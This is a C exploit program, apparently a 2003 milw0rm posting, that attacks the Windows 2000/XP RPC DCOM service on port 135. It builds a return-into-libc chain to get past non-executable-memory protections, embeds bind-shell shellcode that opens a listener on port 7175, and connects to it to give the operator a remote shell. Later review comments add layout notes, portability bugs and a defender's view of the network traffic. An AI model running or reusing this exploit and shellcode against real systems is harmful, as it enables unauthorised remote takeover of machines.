/*
|
|
* have you recently bought one of those expensive new windows security products
|
|
* on the market? do you think you now have strong protection?
|
|
* Look again:
|
|
*
|
|
* *rpc!exec*
|
|
* by ins1der (trixterjack yahoo com)
|
|
*
|
|
* windows remote return into libc exploit!
|
|
*
|
|
* remote rpc exploit breaking non exec memory protection schemes
|
|
* tested against :
|
|
* OverflowGuard
|
|
* StackDefender (kernel32 imagebase randomization:O nice try guys.)
|
|
*
|
|
*
|
|
* currently breaking:
|
|
* Windows 2000 SP0 (english)
|
|
* Windows XP SP0 (english)
|
|
*
|
|
* to get new offsets use this:
|
|
* ------------------------------
|
|
* #include <windows.h>
|
|
* #include <stdio.h>
|
|
*
|
|
* int main()
|
|
* {
|
|
* HANDLE h1,h2;
|
|
* unsigned long addr1,addr2,addr3,addr4;
|
|
* h1=LoadLibrary("ntdll.dll");
|
|
* h2=LoadLibrary("MSVCRT.dll");
|
|
* addr1=(unsigned long)GetProcAddress(h1,"NtAllocateVirtualMemory");
|
|
* addr2=(unsigned long)GetProcAddress(h2,"memcpy");
|
|
* addr3=(unsigned long)GetProcAddress(h1,"NtProtectVirtualMemory");
|
|
* for (addr4=addr1;addr4<addr1+0xffff;addr4++)
|
|
* {
|
|
* if (!memcmp((void*)addr4,"\xc9\xc3",2)) break;
|
|
* }
|
|
* printf("0x%x 0x%x 0x%x 0x%x\n",addr1,addr2,addr3,addr4);
|
|
* return 0;
|
|
* }
|
|
* -----------------------------
|
|
* to get the last offset use a standard rpc dcom exploit with the last
|
|
* \x90\x90 before the shellcode replaced with \xcd\x21. run the exploit
|
|
* and read the drwatson logs. subtract 0xA5 from the fault address.
|
|
*
|
|
*
|
|
* Shouts go to:
|
|
* w00pz, SpaceCow, Int3, lacroix, misu200, j00(xor),
|
|
* s0ny, crisis, and to all my true friends.
|
|
*
|
|
*
|
|
* Enjoy!
|
|
*
|
|
*/
|
|
|
|
#include <sys/socket.h>
|
|
#include <netinet/in.h>
|
|
|
|
unsigned char bindstr[]={
|
|
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
|
|
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
|
|
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
|
|
0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
|
|
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
|
|
|
|
unsigned char request1[]={
|
|
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03,0x00,0x00,0xE5,0x00,0x00,0x00,
|
|
0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00,0x06,0x00,0x01,0x00,0x00,0x00,
|
|
0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45,0x64,0x49,0xB0,0x70,0xDD,0xAE,
|
|
0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
|
|
0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E,0x0D,0x00,0x00,0x00,0x00,0x00,
|
|
0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D,0xCE,0x11,0xA6,0x6A,0x00,0x20,
|
|
0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41,0x52,0x42,0x01,0x00,0x00,0x00,
|
|
0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0xA8,0xF4,0x0B,0x00,
|
|
0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,
|
|
0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
|
|
0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
|
|
0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03,0x00,0x00,0x00,0x00,0x00,0x00,
|
|
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,
|
|
0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,
|
|
0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
|
|
0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29,0xCD,0x00,0x00,0x00,0x00,0x00,
|
|
0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
|
|
0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
|
|
0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
|
|
0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
|
|
0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
|
|
0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
|
|
0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
|
|
0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00,0x00,0x00,0x58,0x00,0x00,0x00,
|
|
0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00,0x00,0x00,0x78,0x00,0x00,0x00,
|
|
0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,
|
|
0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,
|
|
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
|
|
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
|
|
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
|
|
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
|
|
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,
|
|
0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09,0x02,0x00,0x00,0x00,0x00,0x00,
|
|
0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
|
|
0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x78,0x19,0x0C,0x00,
|
|
0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00,0x00,0x00,0x70,0xD8,0x98,0x93,
|
|
0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00,0x00,0x00,0x32,0x00,0x31,0x00,
|
|
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,
|
|
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
|
|
0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00,0x00,0x00,0x60,0x00,0x00,0x00,
|
|
0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,
|
|
0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03,0x00,0x00,0x00,0x00,0x00,0x00,
|
|
0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x00,0x00,0x00,
|
|
0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E,0xE9,0x4A,0x99,0x99,0xF1,0x8A,
|
|
0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
|
|
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
|
|
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00,0x00,0x00,0x78,0x00,0x6E,0x00,
|
|
0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
|
|
0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,
|
|
0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00,0x58,0x00,0x00,0x00,0x00,0x00,
|
|
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00,0x00,0x00,0x30,0x00,0x2E,0x00,
|
|
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
|
|
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00,0x00,0x00,0x0E,0x00,0xFF,0xFF,
|
|
0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00};
|
|
|
|
unsigned char request2[]={
|
|
0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,0x00,0x00,0x5C,0x00,0x5C,0x00
|
|
};
|
|
|
|
unsigned char request3[]={
|
|
0x5C,0x00,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,
|
|
0x35,0x00,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,
|
|
0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,
|
|
0x31,0x00,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};
|
|
|
|
unsigned char request4[]={
|
|
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,
|
|
0x00,0x00,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
|
|
0x28,0x8C,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
|
|
};
|
|
|
|
|
|
/*
 * Per-target address table.  prepare_ret() copies these fields verbatim into
 * the fake frames (fr1/rets); nothing is resolved at run time from the victim,
 * so a row is only valid for the exact build it was taken from.  By the order
 * used in the header comment's helper program, the first three are the
 * addresses of NtAllocateVirtualMemory, msvcrt memcpy and
 * NtProtectVirtualMemory, and `ret` is the address found by the byte scan.
 * Fixed absolute addresses like these are exactly what image-base
 * randomisation (ASLR) is meant to break.
 */
struct offset
{
    char *description;      /* human-readable name; NULL marks the end of targets[] */
    unsigned long valloc;   /* -> rets.valloc */
    unsigned long amemcpy;  /* -> rets.amemcpy */
    unsigned long vprot;    /* -> rets.vprot */
    unsigned long ret;      /* -> fr1.ret, rets.ret1, rets.ret2 */
    unsigned long frame;    /* -> fr1.frame0; every pointer in rets is derived from it */
};

/* Terminated by a NULL description; main() prints the index of each row
 * and passes the user-chosen index (unchecked) to prepare_ret(). */
struct offset targets[]=
{
    {"Windows 2000 SP0 (english)",
     0x77f95da9,
     0x78001194,
     0x77f82ffb,
     0x77f96800,
     0x52f770
    }
    ,
    {"Windows XP SP0 (english)",
     0x77f7e4c3,
     0x77c42e10,
     0x77f7ec43,
     0x77f80a07,
     0x5bf79c
    }
    ,
    {NULL,0,0,0,0,0}
};
|
|
|
|
|
|
unsigned char shell[]=
|
|
|
|
"\x46\x00\x58\x00"
|
|
"\x4E\x00\x42\x00"
|
|
"\x46\x00\x58\x00"
|
|
"\x46\x00\x58\x00"
|
|
|
|
"\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00\x46\x00\x58\x00"
|
|
|
|
"\xff\xff\xff\xff"
|
|
"\xff\xff\xff\xff"
|
|
|
|
"\xcc\xe0\xfd\x7f"
|
|
"\xcc\xe0\xfd\x7f"
|
|
|
|
"\x90\x90\x90\x90"
|
|
"\x90\x90\x90\x90"
|
|
"\x90\x90\x90\x90"
|
|
"\x90\x90\x90\x90"
|
|
"\x90\x90\x90\x90"
|
|
"\x90\x90\x90\x90"
|
|
"\x90\x90\x90\x90"
|
|
"\x90\x90\x90\x90"
|
|
"\x90\x90\x90\x90"
|
|
|
|
"\x90\x90\x90\x90"
|
|
"\x90\x90\x90\x90"
|
|
"\x90\x90\x90\x90"
|
|
"\x90\x90\x90\x90"
|
|
"\x90\x90\x90\x90"
|
|
"\x90\x90\x90\x90"
|
|
|
|
"\x90\x90\x90\x90"
|
|
"\x90\x90\x90\x90"
|
|
"\x90\x90\x90\x90"
|
|
"\x90\x90\x90\x90"
|
|
"\x90\x90\x90\x90"
|
|
"\x90\x90\x90\x90"
|
|
"\x90\x90\x90\x90"
|
|
"\x90\x90\x90\x90"
|
|
|
|
|
|
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
|
|
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
|
|
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
|
|
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
|
|
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
|
|
|
|
"\x83\xec\x34\x8b\xf4\xe8\x47\x01\x00\x00\x89\x06\xff\x36\x68\x8e"
|
|
"\x4e\x0e\xec\xe8\x61\x01\x00\x00\x89\x46\x08\xff\x36\x68\xad\xd9"
|
|
"\x05\xce\xe8\x52\x01\x00\x00\x89\x46\x0c\x68\x6c\x6c\x00\x00\x68"
|
|
"\x33\x32\x2e\x64\x68\x77\x73\x32\x5f\x54\xff\x56\x08\x89\x46\x04"
|
|
"\xff\x36\x68\x72\xfe\xb3\x16\xe8\x2d\x01\x00\x00\x89\x46\x10\xff"
|
|
"\x36\x68\xef\xce\xe0\x60\xe8\x1e\x01\x00\x00\x89\x46\x14\xff\x76"
|
|
"\x04\x68\xcb\xed\xfc\x3b\xe8\x0e\x01\x00\x00\x89\x46\x18\xff\x76"
|
|
"\x04\x68\xd9\x09\xf5\xad\xe8\xfe\x00\x00\x00\x89\x46\x1c\xff\x76"
|
|
"\x04\x68\xa4\x1a\x70\xc7\xe8\xee\x00\x00\x00\x89\x46\x20\xff\x76"
|
|
"\x04\x68\xa4\xad\x2e\xe9\xe8\xde\x00\x00\x00\x89\x46\x24\xff\x76"
|
|
"\x04\x68\xe5\x49\x86\x49\xe8\xce\x00\x00\x00\x89\x46\x28\xff\x76"
|
|
"\x04\x68\xe7\x79\xc6\x79\xe8\xbe\x00\x00\x00\x89\x46\x2c\x33\xff"
|
|
"\x81\xec\x90\x01\x00\x00\x54\x68\x01\x01\x00\x00\xff\x56\x18\x50"
|
|
"\x50\x50\x50\x40\x50\x40\x50\xff\x56\x1c\x8b\xd8\x57\x57\x68\x02"
|
|
"\x00\x1c\x07\x8b\xcc\x6a\x16\x51\x53\xff\x56\x20\x57\x53\xff\x56"
|
|
"\x24\x57\x51\x53\xff\x56\x28\x8b\xd0\x68\x65\x78\x65\x00\x68\x63"
|
|
"\x6d\x64\x2e\x89\x66\x30\x83\xec\x54\x8d\x3c\x24\x33\xc0\x33\xc9"
|
|
"\x83\xc1\x15\xab\xe2\xfd\xc6\x44\x24\x10\x44\xfe\x44\x24\x3d\x89"
|
|
"\x54\x24\x48\x89\x54\x24\x4c\x89\x54\x24\x50\x8d\x44\x24\x10\x54"
|
|
"\x50\x51\x51\x51\x6a\x01\x51\x51\xff\x76\x30\x51\xff\x56\x10\x8b"
|
|
"\xcc\x6a\xff\xff\x31\xff\x56\x0c\x8b\xc8\x57\xff\x56\x2c\xff\x56"
|
|
"\x14\x55\x56\x64\xa1\x30\x00\x00\x00\x85\xc0\x78\x0c\x8b\x40\x0c"
|
|
"\x8b\x70\x1c\xad\x8b\x68\x08\xeb\x09\x8b\x40\x34\x8b\xa8\xb8\x00"
|
|
"\x00\x00\x8b\xc5\x5e\x5d\xc2\x04\x00\x53\x55\x56\x57\x8b\x6c\x24"
|
|
"\x18\x8b\x45\x3c\x8b\x54\x05\x78\x03\xd5\x8b\x4a\x18\x8b\x5a\x20"
|
|
"\x03\xdd\xe3\x32\x49\x8b\x34\x8b\x03\xf5\x33\xff\xfc\x33\xc0\xac"
|
|
"\x3a\xc4\x74\x07\xc1\xcf\x0d\x03\xf8\xeb\xf2\x3b\x7c\x24\x14\x75"
|
|
"\xe1\x8b\x5a\x24\x03\xdd\x66\x8b\x0c\x4b\x8b\x5a\x1c\x03\xdd\x8b"
|
|
"\x04\x8b\x03\xc5\xeb\x02\x33\xc0\x8b\xd5\x5f\x5e\x5d\x5b\xc2\x04"
|
|
"\x00\x90\x90\x90\x80\xbf\x32\x94\x80\xbf\x32\x94";
|
|
|
|
|
|
/*
 * Fake stack frames that prepare_ret() fills in and copies into shell[]
 * (fr1 at byte offset 32, rets at byte offset 48).  The layout is
 * position-dependent: prepare_ret() derives the frame pointers from the
 * field counts of the groups below (9 slots, then 6), so fields must not
 * be reordered, added or re-typed.  Every slot is assumed to be 4 bytes,
 * i.e. a 32-bit host (sizeof(unsigned long)==4).
 */
struct frame1
{
    unsigned long frame0;
    unsigned long ret;
}fr1;

struct retstruct
{
    /* group 1 (9 slots): by name, the allocation call and its arguments */
    unsigned long frame1;
    unsigned long valloc;
    unsigned long ret1;
    unsigned long dummy1;
    unsigned long pointer11;
    unsigned long zero;
    unsigned long pointer12;
    unsigned long type;
    unsigned long prot;

    /* group 2 (6 slots): by name, the memcpy call and its arguments */
    unsigned long frame2;
    unsigned long amemcpy;
    unsigned long ret2;
    unsigned long dest;
    unsigned long src;
    unsigned long size2;

    /* group 3 (8 slots): by name, the protection-change call and its arguments */
    unsigned long frame3;
    unsigned long vprot;
    unsigned long ret3;
    unsigned long dummy2;
    unsigned long pointer21;
    unsigned long pointer22;
    unsigned long newprot;
    unsigned long oldprot;
}rets;
|
|
|
|
/*
 * Fill the fake frames fr1/rets from targets[id] and splice them into
 * shell[].  Everything is absolute: the call addresses come straight from
 * the target table and the data addresses are fixed constants, so the
 * result is only meaningful for the exact builds listed in targets[]; any
 * relocation of the referenced DLLs (ASLR) invalidates every value here.
 *
 * NOTE(review): id is not range-checked here or by the caller (main() passes
 * atoi(argv[2]) straight through); an out-of-range id reads past targets[].
 * NOTE(review): the *(int*)(shell+N) stores and the struct copies assume a
 * 32-bit little-endian host with sizeof(unsigned long)==4; on an LP64 host
 * the struct sizes and therefore the 140/148 offsets no longer line up.
 * NOTE(review): memcpy is used but <string.h> is not included in this file.
 */
void prepare_ret(int id)
{
    /* Argument constants for the allocation/protection calls.  The values
     * match the Win32 MEM_COMMIT|MEM_RESERVE (0x3000), PAGE_READWRITE (0x4)
     * and PAGE_EXECUTE_READ (0x20) constants. */
    rets.type=0x3000;
    rets.prot=0x4;
    rets.newprot=0x20;

    /* Callee addresses for the three frames, per target. */
    rets.valloc=targets[id].valloc;
    rets.amemcpy=targets[id].amemcpy;
    rets.vprot=targets[id].vprot;
    /* The same return address serves fr1 and the first two frames. */
    fr1.ret=rets.ret1=rets.ret2=targets[id].ret;
    fr1.frame0=targets[id].frame;

    /* Frame pointers are derived from frame0 in 4-byte slots: 9 and 6 are
     * the field counts of the first two groups of struct retstruct. */
    rets.frame1=fr1.frame0+9*4;
    rets.frame2=rets.frame1+6*4;
    rets.oldprot=fr1.frame0;
    rets.frame3=rets.frame1;
    rets.size2=sizeof(shell);   /* the copy covers the whole shell[] buffer */

    /* Fixed destination region; ret3 is dest+0x6c. */
    rets.src=fr1.frame0;
    rets.dest=0x55555000;
    rets.ret3=0x5555506c;

    rets.dummy1=rets.dummy2=0xffffffff;
    rets.zero=0;

    /* The destination/size pair is also written twice into shell[] at
     * 140..155, i.e. directly after where rets lands below (48 + 92). */
    *(int*)(shell+148)=0x55555000;
    *(int*)(shell+152)=sizeof(shell);

    *(int*)(shell+140)=0x55555000;
    *(int*)(shell+144)=sizeof(shell);

    /* Pointer-typed arguments point into the frame area itself. */
    rets.pointer11=fr1.frame0+92;
    rets.pointer12=fr1.frame0+96;
    rets.pointer21=fr1.frame0+100;
    rets.pointer22=fr1.frame0+104;

    /* Raw struct copy: no padding expected between unsigned long fields. */
    memcpy(shell+32,&fr1,sizeof(fr1));
    memcpy(shell+48,&rets,sizeof(rets));
}
|
|
|
|
/*
 * Relay loop between stdin/stdout and the connected socket `sock` — a
 * minimal interactive terminal.  Returns when select() or a write() fails,
 * or when read() on the socket reports an error.
 *
 * NOTE(review): a read() that returns 0 (peer closed the socket, or EOF on
 * stdin) is not treated as end of stream: rs==0 falls through to a
 * zero-length write and the loop keeps spinning on a descriptor that is
 * permanently readable-at-EOF, throttled only by usleep(100).
 * NOTE(review): select() is called with FD_SETSIZE but `sock` is never
 * checked against it; FD_SET() on a descriptor >= FD_SETSIZE is undefined.
 * NOTE(review): buffered stdio (printf) is mixed with raw write(1,...), so
 * the status messages can appear out of order with relayed data unless
 * stdout is flushed.
 * NOTE(review): the two error paths are inconsistent — a socket read error
 * returns to the caller, a stdin read error calls exit(1).
 * NOTE(review): read, write, select, usleep and exit are used without the
 * headers that declare them (<unistd.h>, <sys/select.h>, <stdlib.h>).
 */
void entershell(int sock)
{
    char buf[3000];
    fd_set fdr;
    int rs;

    FD_ZERO(&fdr);
    FD_SET(sock,&fdr);
    FD_SET(0,&fdr);

    for(;;)
    {
        /* select() clears the bits of descriptors that were not ready, so
         * both are re-armed on every iteration. */
        FD_SET(sock, &fdr);
        FD_SET(0, &fdr);
        if(select(FD_SETSIZE,&fdr,NULL,NULL,NULL)<0) break;
        if(FD_ISSET(sock, &fdr))
        {
            if((rs=read(sock,buf,sizeof(buf)))<0)
            {
                printf("connection lost\n");
                return;
            }
            if(write(1,buf,rs)<0) break;
        }

        if(FD_ISSET(0,&fdr))
        {
            if((rs=read(0,buf,sizeof(buf)))<0)
            {
                printf("[-] Connection lost..\n");
                exit(1);
            }
            if (write(sock,buf,rs) < 0) break;
        }
        usleep(100);
    }

    printf("connection closed\n");

    return;
}
|
|
|
|
|
|
/*
 * Entry point: `<ip> <id>`.  Builds one request from the request1..4
 * fragments plus shell[], sends a DCERPC bind (bindstr) and that request to
 * TCP/135 on the host, then after one second connects to TCP/7175 on the
 * same host and hands the socket to entershell().
 *
 * Network footprint (what a defender sees): a connection to 135 carrying
 * the bind and a single large request, followed about one second later by
 * a new connection to 7175 on the same host.  The second connection only
 * succeeds if the payload opened a listener there, and that pairing —
 * RPC traffic to 135 followed by a fresh listener on an otherwise unused
 * port — is the observable signal.
 *
 * NOTE(review): atoi(argv[2]) is passed to prepare_ret() unchecked; any
 * value outside the rows of targets[] reads past the array.  inet_addr()
 * failure (INADDR_NONE) is likewise not checked.
 * NOTE(review): the *(unsigned long *)(buf2+N) fixups assume
 * sizeof(unsigned long)==4 and permit unaligned/aliased stores; they are
 * only correct on a 32-bit little-endian host.
 * NOTE(review): the recv() of the bind response is neither checked nor
 * parsed, and there is no bounds check that the assembled request fits in
 * buf2[0x1000].
 * NOTE(review): printf, memcpy, atoi, inet_addr, close and sleep are used
 * without their headers (<stdio.h>, <string.h>, <stdlib.h>, <arpa/inet.h>,
 * <unistd.h>) — only the two socket headers are included.
 * NOTE(review): exit status is inconsistent: 0 on every failure, 1 after a
 * shell session.
 */
int main(int argc, char **argv)
{

    int sock,i,len1;
    struct sockaddr_in sin;
    unsigned char buf1[0x1000],buf2[0x1000];

    if(argc<3)
    {
        printf("###############################\n");
        printf("return into libc rpc exploit\n");
        printf("ins1der 2003\n");
        printf("*****************************************\n");
        printf("usage: %s <ip> <id>\n", argv[0]);
        printf("*****************************************\n");
        printf("targets:\n");
        printf("-----------------------------------------\n");
        for (i=0;targets[i].description!= NULL;i++)
        {
            printf("%d\t%s\n",i,targets[i].description);
        }
        printf("-----------------------------------------\n");

        return 0;
    }

    printf("Exploiting %s...\n",argv[1]);

    /* Fills fr1/rets and patches shell[]; id is not range-checked. */
    prepare_ret(atoi(argv[2]));

    sin.sin_family=AF_INET;
    sin.sin_addr.s_addr=inet_addr(argv[1]);
    sin.sin_port=htons(135);

    if ((sock=socket(AF_INET,SOCK_STREAM,0))==-1)
    {
        perror("socket ");
        return 0;
    }

    if(connect(sock,(struct sockaddr*)&sin, sizeof(sin)))
    {
        perror("connect ");
        return 0;
    }

    /* Assemble buf2 = request1 | request2 | shell | request3 | request4.
     * request2's two length fields are adjusted for the size of shell[]
     * (in 2-byte units) before it is appended. */
    memcpy(buf2,request1,sizeof(request1));
    len1=sizeof(request1);

    *(unsigned long *)(request2)=*(unsigned long *)(request2)+sizeof(shell)/2;
    *(unsigned long *)(request2+8)=*(unsigned long *)(request2+8)+sizeof(shell)/2;

    memcpy(buf2+len1,request2,sizeof(request2));
    len1=len1+sizeof(request2);
    memcpy(buf2+len1,shell,sizeof(shell));
    len1=len1+sizeof(shell);
    memcpy(buf2+len1,request3,sizeof(request3));
    len1=len1+sizeof(request3);
    memcpy(buf2+len1,request4,sizeof(request4));
    len1=len1+sizeof(request4);

    /* Length fields inside the request1 header are corrected by the
     * inserted shell[] bytes (minus a fixed 0xc); offsets are relative to
     * the start of request1 as copied into buf2. */
    *(unsigned long *)(buf2+8)=*(unsigned long *)(buf2+8)+sizeof(shell)-0xc;
    *(unsigned long *)(buf2+0x10)=*(unsigned long *)(buf2+0x10)+sizeof(shell)-0xc;

    *(unsigned long *)(buf2+0x80)=*(unsigned long *)(buf2+0x80)+sizeof(shell)-0xc;
    *(unsigned long *)(buf2+0x84)=*(unsigned long *)(buf2+0x84)+sizeof(shell)-0xc;
    *(unsigned long *)(buf2+0xb4)=*(unsigned long *)(buf2+0xb4)+sizeof(shell)-0xc;
    *(unsigned long *)(buf2+0xb8)=*(unsigned long *)(buf2+0xb8)+sizeof(shell)-0xc;
    *(unsigned long *)(buf2+0xd0)=*(unsigned long *)(buf2+0xd0)+sizeof(shell)-0xc;
    *(unsigned long *)(buf2+0x18c)=*(unsigned long *)(buf2+0x18c)+sizeof(shell)-0xc;

    if (send(sock,(char*)bindstr,sizeof(bindstr),0)==-1)
    {
        perror("send");
        return 0;
    }

    /* Bind response is consumed but never inspected. */
    recv(sock,(char*)buf1,1000,0);

    if (send(sock,(char*)buf2,len1,0)== -1)
    {
        perror("send");
        return 0;
    }
    close(sock);

    /* Fixed grace period before trying the second connection. */
    sleep(1);

    sin.sin_port = htons(7175);

    if ((sock=socket(AF_INET,SOCK_STREAM,0)) == -1)
    {
        perror("socket");
        return(0);
    }

    /* A refused connection here is the only success/failure signal. */
    if(connect(sock,(struct sockaddr *)&sin, sizeof(struct sockaddr)) == -1)
    {
        printf("Exploit failed\n");
        return(0);
    }

    printf("Entering shell\n");
    entershell(sock);
    return 1;

}
|
|
|
|
|
|
// milw0rm.com [2003-11-07]
|